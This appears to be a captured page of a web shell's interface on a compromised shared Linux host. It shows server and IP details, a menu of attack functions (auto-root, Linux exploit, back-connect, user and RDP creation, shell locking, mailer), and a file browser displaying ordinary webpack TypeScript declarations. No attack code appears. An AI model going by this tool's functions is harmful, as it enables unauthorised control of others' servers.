Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
webpack /
declarations /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
debug
[ DIR ]
drwxr-xr-x
optimize
[ DIR ]
drwxr-xr-x
BannerPlugin.d.ts
1
KB
-rw-r--r--
DllPlugin.d.ts
725
B
-rw-r--r--
DllReferencePlugin.d.ts
2.82
KB
-rw-r--r--
HashedModuleIdsPlugin.d.ts
673
B
-rw-r--r--
IgnorePlugin.d.ts
582
B
-rw-r--r--
LoaderOptionsPlugin.d.ts
596
B
-rw-r--r--
ProgressPlugin.d.ts
951
B
-rw-r--r--
SourceMapDevToolPlugin.d.ts
2.65
KB
-rw-r--r--
WatchIgnorePlugin.d.ts
272
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DllReferencePlugin.d.ts
/** * This file was automatically generated. * DO NOT MODIFY BY HAND. * Run `yarn special-lint-fix` to update */ export type DllReferencePluginOptions = | { /** * (absolute path) context of requests in the manifest (or content property) */ context?: string; /** * Extensions used to resolve modules in the dll bundle (only used when using 'scope') */ extensions?: string[]; /** * An object containing content and name or a string to the absolute path of the JSON manifest to be loaded upon compilation */ manifest: DllReferencePluginOptionsManifest | string; /** * The name where the dll is exposed (external name, defaults to manifest.name) */ name?: string; /** * Prefix which is used for accessing the content of the dll */ scope?: string; /** * How the dll is exposed (libraryTarget, defaults to manifest.type) */ sourceType?: DllReferencePluginOptionsSourceType; /** * The way how the export of the dll bundle is used */ type?: "require" | "object"; } | { /** * The mappings from request to module info */ content: DllReferencePluginOptionsContent; /** * (absolute path) context of requests in the manifest (or content property) */ context?: string; /** * Extensions used to resolve modules in the dll bundle (only used when using 'scope') */ extensions?: string[]; /** * The name where the dll is exposed (external name) */ name: string; /** * Prefix which is used for accessing the content of the dll */ scope?: string; /** * How the dll is exposed (libraryTarget) */ sourceType?: DllReferencePluginOptionsSourceType; /** * The way how the export of the dll bundle is used */ type?: "require" | "object"; }; /** * The type how the dll is exposed (external type) */ export type DllReferencePluginOptionsSourceType = | "var" | "assign" | "this" | "window" | "global" | "commonjs" | "commonjs2" | "commonjs-module" | "amd" | "amd-require" | "umd" | "umd2" | "jsonp"; /** * An object containing content, name and type */ export interface DllReferencePluginOptionsManifest { /** * The mappings from request to module info */ content: DllReferencePluginOptionsContent; /** * The name where the dll is exposed (external name) */ name?: string; /** * The type how the dll is exposed (external type) */ type?: DllReferencePluginOptionsSourceType; } /** * The mappings from request to module info */ export interface DllReferencePluginOptionsContent { /** * Module info */ [k: string]: { /** * Meta information about the module */ buildMeta?: { [k: string]: any; }; /** * Information about the provided exports of the module */ exports?: true | string[]; /** * Module ID */ id: number | string; }; }
Close